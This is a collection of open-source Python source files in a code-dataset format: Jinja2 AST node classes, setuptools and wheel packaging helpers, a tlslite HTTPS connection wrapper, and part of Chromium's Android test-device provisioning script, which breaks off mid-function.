def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
return tuple(x.as_const(eval_ctx) for x in self.items)
def can_assign(self):
for item in self.items:
if not item.can_assign():
return False
return True
class List(Literal):
"""Any list literal such as ``[1, 2, 3]``"""
fields = ('items',)
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
return [x.as_const(eval_ctx) for x in self.items]
class Dict(Literal):
"""Any dict literal such as ``{1: 2, 3: 4}``. The items must be a list of
:class:`Pair` nodes.
"""
fields = ('items',)
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
return dict(x.as_const(eval_ctx) for x in self.items)
class Pair(Helper):
"""A key, value pair for dicts."""
fields = ('key', 'value')
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
return self.key.as_const(eval_ctx), self.value.as_const(eval_ctx)
class Keyword(Helper):
"""A key, value pair for keyword arguments where key is a string."""
fields = ('key', 'value')
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
return self.key, self.value.as_const(eval_ctx)
class CondExpr(Expr):
"""A conditional expression (inline if expression). (``{{
foo if bar else baz }}``)
"""
fields = ('test', 'expr1', 'expr2')
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
if self.test.as_const(eval_ctx):
return self.expr1.as_const(eval_ctx)
# if we evaluate to an undefined object, we better do that at runtime
if self.expr2 is None:
raise Impossible()
return self.expr2.as_const(eval_ctx)
class Filter(Expr):
"""This node applies a filter on an expression. `name` is the name of
the filter, the rest of the fields are the same as for :class:`Call`.
If the `node` of a filter is `None` the contents of the last buffer are
filtered. Buffers are created by macros and filter blocks.
"""
fields = ('node', 'name', 'args', 'kwargs', 'dyn_args', 'dyn_kwargs')
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
if eval_ctx.volatile or self.node is None:
raise Impossible()
# we have to be careful here because we call filter_ below.
# if this variable would be called filter, 2to3 would wrap the
# call in a list beause it is assuming we are talking about the
# builtin filter function here which no longer returns a list in
# python 3. because of that, do not rename filter_ to filter!
filter_ = self.environment.filters.get(self.name)
if filter_ is None or getattr(filter_, 'contextfilter', False):
raise Impossible()
obj = self.node.as_const(eval_ctx)
args = [x.as_const(eval_ctx) for x in self.args]
if getattr(filter_, 'evalcontextfilter', False):
args.insert(0, eval_ctx)
elif getattr(filter_, 'environmentfilter', False):
args.insert(0, self.environment)
kwargs = dict(x.as_const(eval_ctx) for x in self.kwargs)
if self.dyn_args is not None:
try:
args.extend(self.dyn_args.as_const(eval_ctx))
except Exception:
raise Impossible()
if self.dyn_kwargs is not None:
try:
kwargs.update(self.dyn_kwargs.as_const(eval_ctx))
except Exception:
raise Impossible()
try:
return filter_(obj, *args, **kwargs)
except Exception:
raise Impossible()
class Test(Expr):
"""Applies a test on an expression. `name` is the name of the test, the
rest of the fields are the same as for :class:`Call`.
"""
fields = ('node', 'name', 'args', 'kwargs', 'dyn_args', 'dyn_kwargs')
class Call(Expr):
"""Calls an expression. `args` is a list of arguments, `kwargs` a list
of keyword arguments (list of :class:`Keyword` nodes), and `dyn_args`
and `dyn_kwargs` has to be either `None` or a node that is used as
node for dynamic positional (``*args``) or keyword (``**kwargs``)
arguments.
"""
fields = ('node', 'args', 'kwargs', 'dyn_args', 'dyn_kwargs')
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
if eval_ctx.volatile:
raise Impossible()
obj = self.node.as_const(eval_ctx)
# don't evaluate context functions
args = [x.as_const(eval_ctx) for x in self.args]
if isinstance(obj, _context_function_types):
if getattr(obj, 'contextfunction', False):
raise Impossible()
elif getattr(obj, 'evalcontextfunction', False):
args.insert(0, eval_ctx)
elif getattr(obj, 'environmentfunction', False):
args.insert(0, self.environment)
kwargs = dict(x.as_const(eval_ctx) for x in self.kwargs)
if self.dyn_args is not None:
try:
args.extend(self.dyn_args.as_const(eval_ctx))
except Exception:
raise Impossible()
if self.dyn_kwargs is not None:
try:
kwargs.update(self.dyn_kwargs.as_const(eval_ctx))
except Exception:
raise Impossible()
try:
return obj(*args, **kwargs)
except Exception:
raise Impossible()
class Getitem(Expr):
"""Get an attribute or item from an expression and prefer the item."""
fields = ('node', 'arg', 'ctx')
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
if self.ctx != 'load':
raise Impossible()
try:
return self.environment.getitem(self.node.as_const(eval_ctx),
self.arg.as_const(eval_ctx))
except Exception:
raise Impossible()
def can_assign(self):
return False
class Getattr(Expr):
"""Get an attribute or item from an expression that is a ascii-only
bytestring and prefer the attribute.
"""
fields = ('node', 'attr', 'ctx')
def as_const(self, eval_ctx=None):
if self.ctx != 'load':
raise Impossible()
try:
eval_ctx = get_eval_context(self, eval_ctx)
return self.environment.getattr(self.node.as_const(eval_ctx),
self.attr)
except Exception:
raise Impossible()
def can_assign(self):
return False
class Slice(Expr):
"""Represents a slice object. This must only be used as argument for
:class:`Subscript`.
"""
fields = ('start', 'stop', 'step')
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
def const(obj):
if obj is None:
return None
return obj.as_const(eval_ctx)
return slice(const(self.start), const(self.stop), const(self.step))
class Concat(Expr):
"""Concatenates the list of expressions provided after converting them to
unicode.
"""
fields = ('nodes',)
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
return ''.join(text_type(x.as_const(eval_ctx)) for x in self.nodes)
class Compare(Expr):
"""Compares an expression with some other expressions. `ops` must be a
list of :class:`Operand`\s.
"""
fields = ('expr', 'ops')
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
result = value = self.expr.as_const(eval_ctx)
try:
for op in self.ops:
new_value = op.expr.as_const(eval_ctx)
result = _cmpop_to_func[op.op](value, new_value)
value = new_value
except Exception:
raise Impossible()
return result
class Operand(Helper):
"""Holds an operator and an expression."""
fields = ('op', 'expr')
if __debug__:
Operand.__doc__ += '\nThe following operators are available: ' + \
', '.join(sorted('``%s``' % x for x in set(_binop_to_func) |
set(_uaop_to_func) | set(_cmpop_to_func)))
class Mul(BinExpr):
"""Multiplies the left with the right node."""
operator = '*'
class Div(BinExpr):
"""Divides the left by the right node."""
operator = '/'
class FloorDiv(BinExpr):
"""Divides the left by the right node and truncates conver the
result into an integer by truncating.
"""
operator = '//'
class Add(BinExpr):
"""Add the left to the right node."""
operator = '+'
class Sub(BinExpr):
"""Substract the right from the left node."""
operator = '-'
class Mod(BinExpr):
"""Left modulo right."""
operator = '%'
class Pow(BinExpr):
"""Left to the power of right."""
operator = '**'
class And(BinExpr):
"""Short circuited AND."""
operator = 'and'
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
return self.left.as_const(eval_ctx) and self.right.as_const(eval_ctx)
class Or(BinExpr):
"""Short circuited OR."""
operator = 'or'
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
return self.left.as_const(eval_ctx) or self.right.as_const(eval_ctx)
class Not(UnaryExpr):
"""Negate the expression."""
operator = 'not'
class Neg(UnaryExpr):
"""Make the expression negative."""
operator = '-'
class Pos(UnaryExpr):
"""Make the expression positive (noop for most expressions)"""
operator = '+'
# Helpers for extensions
class EnvironmentAttribute(Expr):
"""Loads an attribute from the environment object. This is useful for
extensions that want to call a callback stored on the environment.
"""
fields = ('name',)
class ExtensionAttribute(Expr):
"""Returns the attribute of an extension bound to the environment.
The identifier is the identifier of the :class:`Extension`.
This node is usually constructed by calling the
:meth:`~jinja2.ext.Extension.attr` method on an extension.
"""
fields = ('identifier', 'name')
class ImportedName(Expr):
"""If created with an import name the import name is returned on node
access. For example ``ImportedName('cgi.escape')`` returns the `escape`
function from the cgi module on evaluation. Imports are optimized by the
compiler so there is no need to assign them to local variables.
"""
fields = ('importname',)
class InternalName(Expr):
"""An internal name in the compiler. You cannot create these nodes
yourself but the parser provides a
:meth:`~jinja2.parser.Parser.free_identifier` method that creates
a new identifier for you. This identifier is not available from the
template and is not threated specially by the compiler.
"""
fields = ('name',)
def __init__(self):
raise TypeError('Can\'t create internal names. Use the '
'`free_identifier` method on a parser.')
class MarkSafe(Expr):
"""Mark the wrapped expression as safe (wrap it as `Markup`)."""
fields = ('expr',)
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
return Markup(self.expr.as_const(eval_ctx))
class MarkSafeIfAutoescape(Expr):
"""Mark the wrapped expression as safe (wrap it as `Markup`) but
only if autoescaping is active.
.. versionadded:: 2.5
"""
fields = ('expr',)
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
if eval_ctx.volatile:
raise Impossible()
expr = self.expr.as_const(eval_ctx)
if eval_ctx.autoescape:
return Markup(expr)
return expr
class ContextReference(Expr):
"""Returns the current template context. It can be used like a
:class:`Name` node, with a ``'load'`` ctx and will return the
current :class:`~jinja2.runtime.Context` object.
Here an example that assigns the current template name to a
variable named `foo`::
Assign(Name('foo', ctx='store'),
Getattr(ContextReference(), 'name'))
"""
class Continue(Stmt):
"""Continue a loop."""
class Break(Stmt):
"""Break a loop."""
class Scope(Stmt):
"""An artificial scope."""
fields = ('body',)
class EvalContextModifier(Stmt):
"""Modifies the eval context. For each option that should be modified,
a :class:`Keyword` has to be added to the :attr:`options` list.
Example to change the `autoescape` setting::
EvalContextModifier(options=[Keyword('autoescape', Const(True))])
"""
fields = ('options',)
class ScopedEvalContextModifier(EvalContextModifier):
"""Modifies the eval context and reverts it later. Works exactly like
:class:`EvalContextModifier` but will only modify the
:class:`~jinja2.nodes.EvalContext` for nodes in the :attr:`body`.
"""
fields = ('body',)
# make sure nobody creates custom nodes
def _failing_new(*args, **kwargs):
raise TypeError('can\'t create custom node types')
NodeType.__new__ = staticmethod(_failing_new); del _failing_new
| apache-2.0 |
Widiot/simpleblog | venv/lib/python3.5/site-packages/setuptools/command/install_lib.py | 431 | 3840 | import os
import imp
from itertools import product, starmap
import distutils.command.install_lib as orig
class install_lib(orig.install_lib):
"""Don't add compiled flags to filenames of non-Python files"""
def run(self):
self.build()
outfiles = self.install()
if outfiles is not None:
# always compile, in case we have any extension stubs to deal with
self.byte_compile(outfiles)
def get_exclusions(self):
"""
Return a collections.Sized collections.Container of paths to be
excluded for single_version_externally_managed installations.
"""
all_packages = (
pkg
for ns_pkg in self._get_SVEM_NSPs()
for pkg in self._all_packages(ns_pkg)
)
excl_specs = product(all_packages, self._gen_exclusion_paths())
return set(starmap(self._exclude_pkg_path, excl_specs))
def _exclude_pkg_path(self, pkg, exclusion_path):
"""
Given a package name and exclusion path within that package,
compute the full exclusion path.
"""
parts = pkg.split('.') + [exclusion_path]
return os.path.join(self.install_dir, *parts)
@staticmethod
def _all_packages(pkg_name):
"""
>>> list(install_lib._all_packages('foo.bar.baz'))
['foo.bar.baz', 'foo.bar', 'foo']
"""
while pkg_name:
yield pkg_name
pkg_name, sep, child = pkg_name.rpartition('.')
def _get_SVEM_NSPs(self):
"""
Get namespace packages (list) but only for
single_version_externally_managed installations and empty otherwise.
"""
# TODO: is it necessary to short-circuit here? i.e. what's the cost
# if get_finalized_command is called even when namespace_packages is
# False?
if not self.distribution.namespace_packages:
return []
install_cmd = self.get_finalized_command('install')
svem = install_cmd.single_version_externally_managed
return self.distribution.namespace_packages if svem else []
@staticmethod
def _gen_exclusion_paths():
"""
Generate file paths to be excluded for namespace packages (bytecode
cache files).
"""
# always exclude the package module itself
yield '__init__.py'
yield '__init__.pyc'
yield '__init__.pyo'
if not hasattr(imp, 'get_tag'):
return
base = os.path.join('__pycache__', '__init__.' + imp.get_tag())
yield base + '.pyc'
yield base + '.pyo'
yield base + '.opt-1.pyc'
yield base + '.opt-2.pyc'
def copy_tree(
self, infile, outfile,
preserve_mode=1, preserve_times=1, preserve_symlinks=0, level=1
):
assert preserve_mode and preserve_times and not preserve_symlinks
exclude = self.get_exclusions()
if not exclude:
return orig.install_lib.copy_tree(self, infile, outfile)
# Exclude namespace package __init__.py* files from the output
from setuptools.archive_util import unpack_directory
from distutils import log
outfiles = []
def pf(src, dst):
if dst in exclude:
log.warn("Skipping installation of %s (namespace package)",
dst)
return False
log.info("copying %s -> %s", src, os.path.dirname(dst))
outfiles.append(dst)
return dst
unpack_directory(infile, outfile, pf)
return outfiles
def get_outputs(self):
outputs = orig.install_lib.get_outputs(self)
exclude = self.get_exclusions()
if exclude:
return [f for f in outputs if f not in exclude]
return outputs
| mit |
hungtt57/matchmaker | lib/python2.7/site-packages/wheel/egg2wheel.py | 471 | 2633 | #!/usr/bin/env python
import os.path
import re
import sys
import tempfile
import zipfile
import wheel.bdist_wheel
import shutil
import distutils.dist
from distutils.archive_util import make_archive
from argparse import ArgumentParser
from glob import iglob
egg_info_re = re.compile(r'''(?P<name>.+?)-(?P<ver>.+?)
(-(?P<pyver>.+?))?(-(?P<arch>.+?))?.egg''', re.VERBOSE)
def egg2wheel(egg_path, dest_dir):
egg_info = egg_info_re.match(os.path.basename(egg_path)).groupdict()
dir = tempfile.mkdtemp(suffix="_e2w")
if os.path.isfile(egg_path):
# assume we have a bdist_egg otherwise
egg = zipfile.ZipFile(egg_path)
egg.extractall(dir)
else:
# support buildout-style installed eggs directories
for pth in os.listdir(egg_path):
src = os.path.join(egg_path, pth)
if os.path.isfile(src):
shutil.copy2(src, dir)
else:
shutil.copytree(src, os.path.join(dir, pth))
dist_info = "%s-%s" % (egg_info['name'], egg_info['ver'])
abi = 'none'
pyver = egg_info['pyver'].replace('.', '')
arch = (egg_info['arch'] or 'any').replace('.', '_').replace('-', '_')
if arch != 'any':
# assume all binary eggs are for CPython
pyver = 'cp' + pyver[2:]
wheel_name = '-'.join((
dist_info,
pyver,
abi,
arch
))
bw = wheel.bdist_wheel.bdist_wheel(distutils.dist.Distribution())
bw.root_is_purelib = egg_info['arch'] is None
dist_info_dir = os.path.join(dir, '%s.dist-info' % dist_info)
bw.egg2dist(os.path.join(dir, 'EGG-INFO'),
dist_info_dir)
bw.write_wheelfile(dist_info_dir, generator='egg2wheel')
bw.write_record(dir, dist_info_dir)
filename = make_archive(os.path.join(dest_dir, wheel_name), 'zip', root_dir=dir)
os.rename(filename, filename[:-3] + 'whl')
shutil.rmtree(dir)
def main():
parser = ArgumentParser()
parser.add_argument('eggs', nargs='*', help="Eggs to convert")
parser.add_argument('--dest-dir', '-d', default=os.path.curdir,
help="Directory to store wheels (default %(default)s)")
parser.add_argument('--verbose', '-v', action='store_true')
args = parser.parse_args()
for pat in args.eggs:
for egg in iglob(pat):
if args.verbose:
sys.stdout.write("{0}... ".format(egg))
egg2wheel(egg, args.dest_dir)
if args.verbose:
sys.stdout.write("OK\n")
if __name__ == "__main__":
main()
| mit |
glwu/python-for-android | python-build/python-libs/gdata/build/lib/gdata/tlslite/integration/HTTPTLSConnection.py | 271 | 6668 | """TLS Lite + httplib."""
import socket
import httplib
from gdata.tlslite.TLSConnection import TLSConnection
from gdata.tlslite.integration.ClientHelper import ClientHelper
class HTTPBaseTLSConnection(httplib.HTTPConnection):
"""This abstract class provides a framework for adding TLS support
to httplib."""
default_port = 443
def __init__(self, host, port=None, strict=None):
if strict == None:
#Python 2.2 doesn't support strict
httplib.HTTPConnection.__init__(self, host, port)
else:
httplib.HTTPConnection.__init__(self, host, port, strict)
def connect(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if hasattr(sock, 'settimeout'):
sock.settimeout(10)
sock.connect((self.host, self.port))
#Use a TLSConnection to emulate a socket
self.sock = TLSConnection(sock)
#When httplib closes this, close the socket
self.sock.closeSocket = True
self._handshake(self.sock)
def _handshake(self, tlsConnection):
"""Called to perform some sort of handshake.
This method must be overridden in a subclass to do some type of
handshake. This method will be called after the socket has
been connected but before any data has been sent. If this
method does not raise an exception, the TLS connection will be
considered valid.
This method may (or may not) be called every time an HTTP
request is performed, depending on whether the underlying HTTP
connection is persistent.
@type tlsConnection: L{tlslite.TLSConnection.TLSConnection}
@param tlsConnection: The connection to perform the handshake
on.
"""
raise NotImplementedError()
class HTTPTLSConnection(HTTPBaseTLSConnection, ClientHelper):
"""This class extends L{HTTPBaseTLSConnection} to support the
common types of handshaking."""
def __init__(self, host, port=None,
username=None, password=None, sharedKey=None,
certChain=None, privateKey=None,
cryptoID=None, protocol=None,
x509Fingerprint=None,
x509TrustList=None, x509CommonName=None,
settings = None):
"""Create a new HTTPTLSConnection.
For client authentication, use one of these argument
combinations:
- username, password (SRP)
- username, sharedKey (shared-key)
- certChain, privateKey (certificate)
For server authentication, you can either rely on the
implicit mutual authentication performed by SRP or
shared-keys, or you can do certificate-based server
authentication with one of these argument combinations:
- cryptoID[, protocol] (requires cryptoIDlib)
- x509Fingerprint
- x509TrustList[, x509CommonName] (requires cryptlib_py)
Certificate-based server authentication is compatible with
SRP or certificate-based client authentication. It is
not compatible with shared-keys.
The constructor does not perform the TLS handshake itself, but
simply stores these arguments for later. The handshake is
performed only when this class needs to connect with the
server. Thus you should be prepared to handle TLS-specific
exceptions when calling methods inherited from
L{httplib.HTTPConnection} such as request(), connect(), and
send(). See the client handshake functions in
L{tlslite.TLSConnection.TLSConnection} for details on which
exceptions might be raised.
@type host: str
@param host: Server to connect to.
@type port: int
@param port: Port to connect to.
@type username: str
@param username: SRP or shared-key username. Requires the
'password' or 'sharedKey' argument.
@type password: str
@param password: SRP password for mutual authentication.
Requires the 'username' argument.
@type sharedKey: str
@param sharedKey: Shared key for mutual authentication.
Requires the 'username' argument.
@type certChain: L{tlslite.X509CertChain.X509CertChain} or
L{cryptoIDlib.CertChain.CertChain}
@param certChain: Certificate chain for client authentication.
Requires the 'privateKey' argument. Excludes the SRP or
shared-key related arguments.
@type privateKey: L{tlslite.utils.RSAKey.RSAKey}
@param privateKey: Private key for client authentication.
Requires the 'certChain' argument. Excludes the SRP or
shared-key related arguments.
@type cryptoID: str
@param cryptoID: cryptoID for server authentication. Mutually
exclusive with the 'x509...' arguments.
@type protocol: str
@param protocol: cryptoID protocol URI for server
authentication. Requires the 'cryptoID' argument.
@type x509Fingerprint: str
@param x509Fingerprint: Hex-encoded X.509 fingerprint for
server authentication. Mutually exclusive with the 'cryptoID'
and 'x509TrustList' arguments.
@type x509TrustList: list of L{tlslite.X509.X509}
@param x509TrustList: A list of trusted root certificates. The
other party must present a certificate chain which extends to
one of these root certificates. The cryptlib_py module must be
installed to use this parameter. Mutually exclusive with the
'cryptoID' and 'x509Fingerprint' arguments.
@type x509CommonName: str
@param x509CommonName: The end-entity certificate's 'CN' field
must match this value. For a web server, this is typically a
server name such as 'www.amazon.com'. Mutually exclusive with
the 'cryptoID' and 'x509Fingerprint' arguments. Requires the
'x509TrustList' argument.
@type settings: L{tlslite.HandshakeSettings.HandshakeSettings}
@param settings: Various settings which can be used to control
the ciphersuites, certificate types, and SSL/TLS versions
offered by the client.
"""
HTTPBaseTLSConnection.__init__(self, host, port)
ClientHelper.__init__(self,
username, password, sharedKey,
certChain, privateKey,
cryptoID, protocol,
x509Fingerprint,
x509TrustList, x509CommonName,
settings)
def _handshake(self, tlsConnection):
ClientHelper._handshake(self, tlsConnection)
| apache-2.0 |
danakj/chromium | build/android/provision_devices.py | 5 | 22286 | #!/usr/bin/env python
#
# Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Provisions Android devices with settings required for bots.
Usage:
./provision_devices.py [-d <device serial number>]
"""
import argparse
import datetime
import json
import logging
import os
import posixpath
import re
import subprocess
import sys
import time
# Import _strptime before threaded code. datetime.datetime.strptime is
# threadsafe except for the initial import of the _strptime module.
# See crbug.com/584730 and https://bugs.python.org/issue7980.
import _strptime # pylint: disable=unused-import
import devil_chromium
from devil.android import battery_utils
from devil.android import device_blacklist
from devil.android import device_errors
from devil.android import device_temp_file
from devil.android import device_utils
from devil.android.sdk import keyevent
from devil.android.sdk import version_codes
from devil.constants import exit_codes
from devil.utils import run_tests_helper
from devil.utils import timeout_retry
from pylib import constants
from pylib import device_settings
from pylib.constants import host_paths
_SYSTEM_WEBVIEW_PATHS = ['/system/app/webview', '/system/app/WebViewGoogle']
_CHROME_PACKAGE_REGEX = re.compile('.*chrom.*')
_TOMBSTONE_REGEX = re.compile('tombstone.*')
class _DEFAULT_TIMEOUTS(object):
# L can take a while to reboot after a wipe.
LOLLIPOP = 600
PRE_LOLLIPOP = 180
HELP_TEXT = '{}s on L, {}s on pre-L'.format(LOLLIPOP, PRE_LOLLIPOP)
class _PHASES(object):
WIPE = 'wipe'
PROPERTIES = 'properties'
FINISH = 'finish'
ALL = [WIPE, PROPERTIES, FINISH]
def ProvisionDevices(args):
blacklist = (device_blacklist.Blacklist(args.blacklist_file)
if args.blacklist_file
else None)
devices = [d for d in device_utils.DeviceUtils.HealthyDevices(blacklist)
if not args.emulators or d.adb.is_emulator]
if args.device:
devices = [d for d in devices if d == args.device]
if not devices:
raise device_errors.DeviceUnreachableError(args.device)
parallel_devices = device_utils.DeviceUtils.parallel(devices)
if args.emulators:
parallel_devices.pMap(SetProperties, args)
else:
parallel_devices.pMap(ProvisionDevice, blacklist, args)
if args.auto_reconnect:
_LaunchHostHeartbeat()
blacklisted_devices = blacklist.Read() if blacklist else []
if args.output_device_blacklist:
with open(args.output_device_blacklist, 'w') as f:
json.dump(blacklisted_devices, f)
if all(d in blacklisted_devices for d in devices):
raise device_errors.NoDevicesError
return 0
def ProvisionDevice(device, blacklist, options):
def should_run_phase(phase_name):
return not options.phases or phase_name in options.phases
def run_phase(phase_func, reboot_timeout, reboot=True):
try:
device.WaitUntilFullyBooted(timeout=reboot_timeout, retries=0)
except device_errors.CommandTimeoutError:
logging.error('Device did not finish booting. Will try to reboot.')
device.Reboot(timeout=reboot_timeout)
phase_func(device, options)
if reboot:
device.Reboot(False, retries=0)
device.adb.WaitForDevice()
try:
if options.reboot_timeout:
reboot_timeout = options.reboot_timeout
elif device.build_version_sdk >= version_codes.LOLLIPOP:
reboot_timeout = _DEFAULT_TIMEOUTS.LOLLIPOP
else:
reboot_timeout = _DEFAULT_TIMEOUTS.PRE_LOLLIPOP
if should_run_phase(_PHASES.WIPE):
if (options.chrome_specific_wipe or device.IsUserBuild() or
device.build_version_sdk >= version_codes.MARSHMALLOW):
run_phase(WipeChromeData, reboot_timeout)
else:
run_phase(WipeDevice, reboot_timeout)
if should_run_phase(_PHASES.PROPERTIES):
run_phase(SetProperties, reboot_timeout)
if should_run_phase(_PHASES.FINISH):
run_phase(FinishProvisioning, reboot_timeout, reboot=False)
if options.chrome_specific_wipe:
package = "com.google.android.gms"
version_name = device.GetApplicationVersion(package)
logging.info("Version name for %s is %s", package, version_name)
CheckExternalStorage(device)
except device_errors.CommandTimeoutError:
logging.exception('Timed out waiting for device %s. Adding to blacklist.',
str(device))
if blacklist:
blacklist.Extend([str(device)], reason='provision_timeout')
except device_errors.CommandFailedError:
logging.exception('Failed to provision device %s. Adding to blacklist.',
str(device))
if blacklist:
blacklist.Extend([str(device)], reason='provision_failure')
def CheckExternalStorage(device):
"""Checks that storage is writable and if not makes it writable.
Arguments:
device: The device to check.
"""
try:
with device_temp_file.DeviceTempFile(
device.adb, suffix='.sh', dir=device.GetExternalStoragePath()) as f:
device.WriteFile(f.name, 'test')
except device_errors.CommandFailedError:
logging.info('External storage not writable. Remounting / as RW')
device.RunShellCommand(['mount', '-o', 'remount,rw', '/'],
check_return=True, as_root=True)
device.EnableRoot()
with device_temp_file.DeviceTempFile(
device.adb, suffix='.sh', dir=device.GetExternalStoragePath()) as f:
device.WriteFile(f.name, 'test')
def WipeChromeData(device, options):
"""Wipes chrome specific data from device
(1) uninstall any app whose name matches *chrom*, except
com.android.chrome, which is the chrome stable package. Doing so also
removes the corresponding dirs under /data/data/ and /data/app/
(2) remove any dir under /data/app-lib/ whose name matches *chrom*
(3) remove any files under /data/tombstones/ whose name matches "tombstone*"
(4) remove /data/local.prop if there is any
(5) remove /data/local/chrome-command-line if there is any
(6) remove anything under /data/local/.config/ if the dir exists
(this is telemetry related)
(7) remove anything under /data/local/tmp/
Arguments:
device: the device to wipe
"""
if options.skip_wipe:
return
try:
if device.IsUserBuild():
_UninstallIfMatch(device, _CHROME_PACKAGE_REGEX,
constants.PACKAGE_INFO['chrome_stable'].package)
device.RunShellCommand('rm -rf %s/*' % device.GetExternalStoragePath(),
check_return=True)
device.RunShellCommand('rm -rf /data/local/tmp/*', check_return=True)
else:
device.EnableRoot()
_UninstallIfMatch(device, _CHROME_PACKAGE_REGEX,
constants.PACKAGE_INFO['chrome_stable'].package)
_WipeUnderDirIfMatch(device, '/data/app-lib/', _CHROME_PACKAGE_REGEX)
_WipeUnderDirIfMatch(device, '/data/tombstones/', _TOMBSTONE_REGEX)
_WipeFileOrDir(device, '/data/local.prop')
_WipeFileOrDir(device, '/data/local/chrome-command-line')
_WipeFileOrDir(device, '/data/local/.config/')
_WipeFileOrDir(device, '/data/local/tmp/')
device.RunShellCommand('rm -rf %s/*' % device.GetExternalStoragePath(),
check_return=True)
except device_errors.CommandFailedError:
logging.exception('Possible failure while wiping the device. '
'Attempting to continue.')
def WipeDevice(device, options):
"""Wipes data from device, keeping only the adb_keys for authorization.
After wiping data on a device that has been authorized, adb can still
communicate with the device, but after reboot the device will need to be
re-authorized because the adb keys file is stored in /data/misc/adb/.
Thus, adb_keys file is rewritten so the device does not need to be
re-authorized.
Arguments:
device: the device to wipe
"""
if options.skip_wipe:
return
try:
device.EnableRoot()
device_authorized = device.FileExists(constants.ADB_KEYS_FILE)
if device_authorized:
adb_keys = device.ReadFile(constants.ADB_KEYS_FILE,
as_root=True).splitlines()
device.RunShellCommand(['wipe', 'data'],
as_root=True, check_return=True)
device.adb.WaitForDevice()
if device_authorized:
adb_keys_set = set(adb_keys)
for adb_key_file in options.adb_key_files or []:
try:
with open(adb_key_file, 'r') as f:
adb_public_keys = f.readlines()
adb_keys_set.update(adb_public_keys)
except IOError:
logging.warning('Unable to find adb keys file %s.', adb_key_file)
_WriteAdbKeysFile(device, '\n'.join(adb_keys_set))
except device_errors.CommandFailedError:
logging.exception('Possible failure while wiping the device. '
'Attempting to continue.')
def _WriteAdbKeysFile(device, adb_keys_string):
dir_path = posixpath.dirname(constants.ADB_KEYS_FILE)
device.RunShellCommand(['mkdir', '-p', dir_path],
as_root=True, check_return=True)
device.RunShellCommand(['restorecon', dir_path],
as_root=True, check_return=True)
device.WriteFile(constants.ADB_KEYS_FILE, adb_keys_string, as_root=True)
device.RunShellCommand(['restorecon', constants.ADB_KEYS_FILE],
as_root=True, check_return=True)
def SetProperties(device, options):
try:
device.EnableRoot()
except device_errors.CommandFailedError as e:
logging.warning(str(e))
if not device.IsUserBuild():
_ConfigureLocalProperties(device, options.enable_java_debug)
else:
logging.warning('Cannot configure properties in user builds.')
device_settings.ConfigureContentSettings(
device, device_settings.DETERMINISTIC_DEVICE_SETTINGS)
if options.disable_location:
device_settings.ConfigureContentSettings(
device, device_settings.DISABLE_LOCATION_SETTINGS)
else:
device_settings.ConfigureContentSettings(
device, device_settings.ENABLE_LOCATION_SETTINGS)
if options.disable_mock_location:
device_settings.ConfigureContentSettings(
device, device_settings.DISABLE_MOCK_LOCATION_SETTINGS)
else:
device_settings.ConfigureContentSettings(
device, device_settings.ENABLE_MOCK_LOCATION_SETTINGS)
device_settings.SetLockScreenSettings(device)
if options.disable_network:
device_settings.ConfigureContentSettings(
device, device_settings.NETWORK_DISABLED_SETTINGS)
if device.build_version_sdk >= version_codes.MARSHMALLOW:
# Ensure that NFC is also switched off.
device.RunShellCommand(['svc', 'nfc', 'disable'],
as_root=True, check_return=True)
if options.disable_system_chrome:
# The system chrome version on the device interferes with some tests.
device.RunShellCommand(['pm', 'disable', 'com.android.chrome'],
check_return=True)
if options.remove_system_webview:
if any(device.PathExists(p) for p in _SYSTEM_WEBVIEW_PATHS):
logging.info('System WebView exists and needs to be removed')
if device.HasRoot():
# Disabled Marshmallow's Verity security feature
if device.build_version_sdk >= version_codes.MARSHMALLOW:
device.adb.DisableVerity()
device.Reboot()
device.WaitUntilFullyBooted()
device.EnableRoot()
# This is required, e.g., to replace the system webview on a device.
device.adb.Remount()
device.RunShellCommand(['stop'], check_return=True)
device.RunShellCommand(['rm', '-rf'] + _SYSTEM_WEBVIEW_PATHS,
check_return=True)
device.RunShellCommand(['start'], check_return=True)
else:
logging.warning('Cannot remove system webview from a non-rooted device')
else:
logging.info('System WebView already removed')
# Some device types can momentarily disappear after setting properties.
device.adb.WaitForDevice()
def _ConfigureLocalProperties(device, java_debug=True):
"""Set standard readonly testing device properties prior to reboot."""
local_props = [
'persist.sys.usb.config=adb',
'ro.monkey=1',
'ro.test_harness=1',
'ro.audio.silent=1',
'ro.setupwizard.mode=DISABLED',
]
if java_debug:
local_props.append(
'%s=all' % device_utils.DeviceUtils.JAVA_ASSERT_PROPERTY)
local_props.append('debug.checkjni=1')
try:
device.WriteFile(
device.LOCAL_PROPERTIES_PATH,
'\n'.join(local_props), as_root=True)
# Android will not respect the local props file if it is world writable.
device.RunShellCommand(
['chmod', '644', device.LOCAL_PROPERTIES_PATH],
as_root=True, check_return=True)
except device_errors.CommandFailedError:
logging.exception('Failed to configure local properties.')
def FinishProvisioning(device, options):
# The lockscreen can't be disabled on user builds, so send a keyevent
# to unlock it.
if device.IsUserBuild():
device.SendKeyEvent(keyevent.KEYCODE_MENU)
if options.min_battery_level is not None:
battery = battery_utils.BatteryUtils(device)
try:
battery.ChargeDeviceToLevel(options.min_battery_level)
except device_errors.DeviceChargingError:
device.Reboot()
battery.ChargeDeviceToLevel(options.min_battery_level)
if options.max_battery_temp is not None:
try:
